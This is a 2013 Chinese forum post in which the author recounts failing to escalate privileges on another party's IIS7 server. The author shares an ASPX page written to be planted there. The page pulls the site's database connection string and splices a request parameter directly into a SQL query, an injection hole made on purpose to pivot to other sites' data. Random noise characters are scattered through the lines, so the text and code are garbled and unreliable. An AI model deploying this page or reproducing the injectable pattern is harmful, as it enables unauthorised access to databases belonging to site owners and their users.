昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。& x2 b) N3 k3 A# G
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
$ B3 k, K9 K) ?- [. s代码量不多,自己写个拉倒了。烦死了。7 q% n1 ^4 D% c4 j
# E! ^5 q7 J% l) W _
; T1 b8 Y& k, {- R2 k9 m1 o<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
" k( e8 ^: o) B6 t7 c9 D' j<html xmlns="http://www.w3.org/1999/xhtml">! i1 ~& T7 L) h9 m7 C7 X( _
<head runat="server">" n! i1 R+ ~" d. j$ }) S
<title>暗影aspx构造注射专用页面</title>6 ?6 y2 r9 w$ C$ @; l- d) u; S
</head>
" [3 H) `( y' t7 Q, Y! p<body>
; v9 S! l) X9 w- R <form id="form1" runat="server"> x! C2 v6 G$ Y# K. t) F
<div>* d; J! |2 @0 c9 U
<script language="c#" runat="server">
! ^; d A/ v4 N% u# p
( H+ k8 _2 C+ Y! e0 v; y# u8 Q void page_init(object sender, EventArgs e)
4 B$ \' F3 W6 u0 d {
; ?0 [* p" d+ f, q4 ]" F4 o2 ^
: G% C5 s& I4 W+ {! c5 D System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
$ D; K0 {; m+ X A% v
- a: ]& g2 p- c; N! H conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();$ D3 P5 Q" [" o
conn.Open();( @ h2 ?# c: d9 e! Z% \' s
f/ j1 r a2 n; V; u+ d) z
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
% K' u3 u* _" ] : }$ c4 F- d9 A F
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);( R+ f. ]8 y1 k9 S9 T z; W
int x = command.ExecuteNonQuery();
* I n/ h5 m: Q) h' V; l8 D Response.Write(i+"\n");
" A$ V, U- Q( ~7 p' f8 ~* U) y Response.Write(x);
, P* j5 m+ S, f/ b7 t conn.Close();
6 y; j" M1 Z4 _7 | }, Z2 D6 D# {& q4 P
- [) Q/ s F6 v' F" C
</script>
* X- b& P7 K `) J- F </div>, E- C/ v! H) }; `4 f% |
</form>/ {1 N, A5 B/ B2 v4 v
</body>
; _) W; w% |- _2 C% P0 n</html>/ ~8 s. B8 w3 N; W0 w/ k0 V. e
|
发表于 2013-3-20 21:32:01
收藏
支持
反对